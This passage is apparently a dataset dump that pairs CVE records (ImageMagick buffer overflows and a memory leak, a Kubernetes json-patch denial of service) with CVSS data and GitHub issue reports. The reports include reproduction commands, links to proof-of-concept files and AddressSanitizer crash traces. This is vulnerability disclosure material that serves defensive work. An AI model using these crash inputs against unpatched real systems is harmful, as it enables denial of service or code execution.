cve_id
stringlengths 13
16
| cve_published
stringlengths 23
23
| cve_descriptions
stringlengths 48
2.08k
| cve_metrics
dict | cve_references
listlengths 1
138
| cve_configurations
listlengths 1
39
| url
stringlengths 37
77
| cve_tags
sequencelengths 1
4
⌀ | domain
stringclasses 1
value | issue_owner_repo
sequencelengths 2
2
| issue_body
stringlengths 0
88.6k
⌀ | issue_title
stringlengths 3
335
| issue_comments_url
stringlengths 56
81
| issue_comments_count
int64 0
146
| issue_created_at
stringlengths 20
20
| issue_updated_at
stringlengths 20
20
| issue_html_url
stringlengths 37
62
| issue_github_id
int64 104M
2.09B
| issue_number
int64 1
122k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2019-9956 | 2019-03-24T00:29:00.213 | In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00010.html"
},
{
"source": "[email protected]",
"tags": [
"VDB Entry",
"Third Party Advisory"
],
"url": "http://www.securityfocus.com/bid/107546"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/107672"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1523"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/Apr/37"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4436"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:q16:*:*:*:*:*:*",
"matchCriteriaId": "7D254272-9A50-4719-8FC1-3DB7E74B141F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1523 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [Y] I have written a descriptive issue title
- [Y] I have verified that I am using the latest version of ImageMagick
- [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a stack buffer overflow vulnerability in PopHexPixel of ps.c which could lead to code execution.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
[poc](https://drive.google.com/open?id=15oA65eaHZi7lMmx6fJU2MkKQ8IlVBpBv)
magick convert $poc ./test.ps
`root@ubuntu:/home/test# ./ImageMagick_as/utilities/magick convert ./stack-buffer-overflow-in-ps ./test.ps`
`=================================================================`
`==80022==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc0dc5d3c0 at pc 0x00000067e3f4 bp 0x7ffc0dc5c7d0 sp 0x7ffc0dc5c7c0`
`WRITE of size 1 at 0x7ffc0dc5d3c0 thread T0`
` #0 0x67e3f3 in PopHexPixel coders/ps.c:1184`
` #1 0x682bf3 in WritePSImage coders/ps.c:2232`
` #2 0x84b8e7 in WriteImage MagickCore/constitute.c:1159`
` #3 0x84c60c in WriteImages MagickCore/constitute.c:1376`
` #4 0xbf328d in ConvertImageCommand MagickWand/convert.c:3305`
` #5 0xcdf3de in MagickCommandGenesis MagickWand/mogrify.c:184`
` #6 0x4103f1 in MagickMain utilities/magick.c:149`
` #7 0x4105d2 in main utilities/magick.c:180`
` #8 0x7fb06d32b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)`
` #9 0x40ff08 in _start (/home/.test/test/ImageMagick_as/utilities/magick+0x40ff08)`
``
`Address 0x7ffc0dc5d3c0 is located in stack of thread T0 at offset 2752 in frame`
` #0 0x67e48e in WritePSImage coders/ps.c:1191`
``
` This frame has 13 object(s):`
` [32, 48) 'delta'`
` [96, 112) 'resolution'`
` [160, 176) 'scale'`
` [224, 256) 'geometry'`
` [288, 320) 'media_info'`
` [352, 384) 'page_info'`
` [416, 448) 'bounds'`
` [480, 520) 'geometry_info'`
` [576, 664) 'pixel'`
` [704, 2752) 'pixels' <== Memory access at offset 2752 overflows this variable`
` [2784, 6880) 'buffer'`
` [6912, 11008) 'date'`
` [11040, 15136) 'page_geometry'`
`HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext`
` (longjmp and C++ exceptions *are* supported)`
`SUMMARY: AddressSanitizer: stack-buffer-overflow coders/ps.c:1184 PopHexPixel`
`Shadow bytes around the buggy address:`
` 0x100001b83a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
`=>0x100001b83a70: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 00 00 00 00`
` 0x100001b83a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
` 0x100001b83ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`
`Shadow byte legend (one shadow byte represents 8 application bytes):`
` Addressable: 00`
` Partially addressable: 01 02 03 04 05 06 07 `
` Heap left redzone: fa`
` Heap right redzone: fb`
` Freed heap region: fd`
` Stack left redzone: f1`
` Stack mid redzone: f2`
` Stack right redzone: f3`
` Stack partial redzone: f4`
` Stack after return: f5`
` Stack use after scope: f8`
` Global redzone: f9`
` Global init order: f6`
` Poisoned by user: f7`
` Container overflow: fc`
` Array cookie: ac`
` Intra object redzone: bb`
` ASan internal: fe`
`==80022==ABORTING`
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-35 Q16 x86_64 2019-03-22 https://imagemagick.org
Copyright: ? 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib
- Environment (Operating system, version and so on):
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
- Additional information:
<!-- Thanks for reporting the issue to ImageMagick! -->
| stack-buffer-overflow in PopHexPixel of ps.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1523/comments | 5 | 2019-03-22T10:37:33Z | 2019-03-26T09:38:55Z | https://github.com/ImageMagick/ImageMagick/issues/1523 | 424,144,480 | 1,523 |
CVE-2019-10649 | 2019-03-30T14:29:00.240 | In ImageMagick 7.0.8-36 Q16, there is a memory leak in the function SVGKeyValuePairs of coders/svg.c, which allows an attacker to cause a denial of service via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "http://www.securityfocus.com/bid/107645"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1533"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-36:q16:*:*:*:*:*:*",
"matchCriteriaId": "0DE4BD49-D481-47E8-B2E3-61482590D669",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
"matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1533 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [Y] I have written a descriptive issue title
- [Y] I have verified that I am using the latest version of ImageMagick
- [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a memory leak vulnerability in function SVGKeyValuePairs of coders/svg.c.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
[poc](https://drive.google.com/open?id=178I9vAWVNgp4Fwn9PZxaVZuLHaJyTPC-)
magick convert $poc /dev/null
`=================================================================`
`==8783==ERROR: LeakSanitizer: detected memory leaks`
`Direct leak of 144 byte(s) in 1 object(s) allocated from:`
` #0 0x7f1f6d7c1961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961)`
` #1 0x441b30 in ResizeMagickMemory MagickCore/memory.c:1302`
` #2 0x441bb4 in ResizeQuantumMemory MagickCore/memory.c:1366`
` #3 0x6d3c1c in SVGKeyValuePairs coders/svg.c:752`
` #4 0x6df888 in SVGEndElement coders/svg.c:2811`
` #5 0x7f1f6a0ae91c (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x4c91c)`
`Direct leak of 80 byte(s) in 1 object(s) allocated from:`
` #0 0x7f1f6d7c1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)`
` #1 0x440828 in AcquireMagickMemory MagickCore/memory.c:478`
` #2 0x44087c in AcquireQuantumMemory MagickCore/memory.c:551`
` #3 0x6d3b13 in SVGKeyValuePairs coders/svg.c:733`
` #4 0x6df888 in SVGEndElement coders/svg.c:2811`
` #5 0x7f1f6a0ae91c (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x4c91c)`
`Indirect leak of 71185 byte(s) in 17 object(s) allocated from:`
` #0 0x7f1f6d7c1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)`
` #1 0x440828 in AcquireMagickMemory MagickCore/memory.c:478`
` #2 0x44087c in AcquireQuantumMemory MagickCore/memory.c:551`
` #3 0x4c22c5 in AcquireString MagickCore/string.c:142`
` #4 0x6d3cad in SVGKeyValuePairs coders/svg.c:760`
` #5 0x6df888 in SVGEndElement coders/svg.c:2811`
` #6 0x7f1f6a0ae91c (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x4c91c)`
`Indirect leak of 8194 byte(s) in 2 object(s) allocated from:`
` #0 0x7f1f6d7c1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)`
` #1 0x440828 in AcquireMagickMemory MagickCore/memory.c:478`
` #2 0x44087c in AcquireQuantumMemory MagickCore/memory.c:551`
` #3 0x4c22c5 in AcquireString MagickCore/string.c:142`
` #4 0x6d3dd3 in SVGKeyValuePairs coders/svg.c:766`
` #5 0x6df888 in SVGEndElement coders/svg.c:2811`
` #6 0x7f1f6a0ae91c (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x4c91c)`
`SUMMARY: AddressSanitizer: 79603 byte(s) leaked in 21 allocation(s).`
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-36 Q16 x86_64 2019-03-28 https://imagemagick.org
Copyright: ? 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib
- Environment (Operating system, version and so on):
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
- Additional information:
<!-- Thanks for reporting the issue to ImageMagick! -->
| memory leak in SVGKeyValuePairs of coders/svg.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1533/comments | 5 | 2019-03-28T15:41:27Z | 2019-06-27T04:31:35Z | https://github.com/ImageMagick/ImageMagick/issues/1533 | 426,565,379 | 1,533 |
CVE-2019-10650 | 2019-03-30T14:29:00.303 | In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00010.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/107646"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1532"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00015.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/Apr/37"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4034-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4436"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-36:q16:*:*:*:*:*:*",
"matchCriteriaId": "0DE4BD49-D481-47E8-B2E3-61482590D669",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1532 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [Y] I have written a descriptive issue title
- [Y] I have verified that I am using the latest version of ImageMagick
- [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a heap buffer overflow vulnerability in function WriteTIFFImage of coders/tiff.c.
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
[poc](https://drive.google.com/open?id=1VPmM34DHDhFYJCMKvRYIAH4iT14hVsOE)
magick convert $poc /dev/null
`=================================================================`
`==18861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b6b8 at pc 0x7fef0e998935 bp 0x7ffec33e6c90 sp 0x7ffec33e6438`
`READ of size 512 at 0x60200000b6b8 thread T0`
` #0 0x7fef0e998934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)`
` #1 0x7fef0dfa102b (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x1802b)`
` #2 0x7a392b in WriteTIFFImage coders/tiff.c:4309`
` #3 0x84807b in WriteImage MagickCore/constitute.c:1159`
` #4 0x848da0 in WriteImages MagickCore/constitute.c:1376`
` #5 0xbefa57 in ConvertImageCommand MagickWand/convert.c:3305`
` #6 0xcdbba8 in MagickCommandGenesis MagickWand/mogrify.c:184`
` #7 0x40fff1 in MagickMain utilities/magick.c:149`
` #8 0x4101d2 in main utilities/magick.c:180`
` #9 0x7fef0a20682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)`
` #10 0x40fb08 in _start (/home/ImageMagick_as/utilities/magick+0x40fb08)`
``
`0x60200000b6b8 is located 0 bytes to the right of 8-byte region [0x60200000b6b0,0x60200000b6b8)`
`allocated by thread T0 here:`
` #0 0x7fef0e9a4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)`
` #1 0x7fef0df923d4 (/usr/lib/x86_64-linux-gnu/libtiff.so.5+0x93d4)`
``
`SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy`
`Shadow bytes around the buggy address:`
` 0x0c047fff9680: fa fa fd fd fa fa 00 07 fa fa 00 04 fa fa 00 04`
` 0x0c047fff9690: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04`
` 0x0c047fff96a0: fa fa fd fa fa fa 02 fa fa fa 00 03 fa fa 00 04`
` 0x0c047fff96b0: fa fa 05 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa`
` 0x0c047fff96c0: fa fa fd fd fa fa fd fa fa fa fd fa fa fa 00 00`
`=>0x0c047fff96d0: fa fa 00 fa fa fa 00[fa]fa fa 00 fa fa fa 00 fa`
` 0x0c047fff96e0: fa fa 00 fa fa fa 00 00 fa fa fd fa fa fa fd fa`
` 0x0c047fff96f0: fa fa 00 00 fa fa 02 fa fa fa 00 03 fa fa 00 04`
` 0x0c047fff9700: fa fa 05 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa`
` 0x0c047fff9710: fa fa 00 fa fa fa fd fa fa fa fd fa fa fa fd fa`
` 0x0c047fff9720: fa fa fd fa fa fa fa fa fa fa fa fa fa fa fd fa`
`Shadow byte legend (one shadow byte represents 8 application bytes):`
` Addressable: 00`
` Partially addressable: 01 02 03 04 05 06 07 `
` Heap left redzone: fa`
` Heap right redzone: fb`
` Freed heap region: fd`
` Stack left redzone: f1`
` Stack mid redzone: f2`
` Stack right redzone: f3`
` Stack partial redzone: f4`
` Stack after return: f5`
` Stack use after scope: f8`
` Global redzone: f9`
` Global init order: f6`
` Poisoned by user: f7`
` Container overflow: fc`
` Array cookie: ac`
` Intra object redzone: bb`
` ASan internal: fe`
`==18861==ABORTING`
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-36 Q16 x86_64 2019-03-28 https://imagemagick.org
Copyright: ? 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib
- Environment (Operating system, version and so on):
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
- Additional information:
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in WriteTIFFImage of coders/tiff.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1532/comments | 5 | 2019-03-28T15:33:16Z | 2019-05-18T13:35:30Z | https://github.com/ImageMagick/ImageMagick/issues/1532 | 426,560,687 | 1,532 |
CVE-2019-1002100 | 2019-04-01T14:29:00.483 | In all Kubernetes versions prior to v1.11.8, v1.12.6, and v1.13.4, users that are authorized to make patch requests to the Kubernetes API Server can send a specially crafted patch of type "json-patch" (e.g. `kubectl patch --type json` or `"Content-Type: application/json-patch+json"`) that consumes excessive resources while processing, causing a Denial of Service on the API Server. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/107290"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1851"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3239"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/74534"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://groups.google.com/forum/#%21topic/kubernetes-announce/vmUUNkYfG9g"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190416-0002/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0DA71853-0F00-4D01-834F-63A8B24A27AB",
"versionEndExcluding": "1.11.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60751439-CACB-49C0-A739-BE3203292E67",
"versionEndExcluding": "1.12.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.12.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E3041501-9145-4C0D-943F-0C1617140D23",
"versionEndExcluding": "1.13.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.13.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
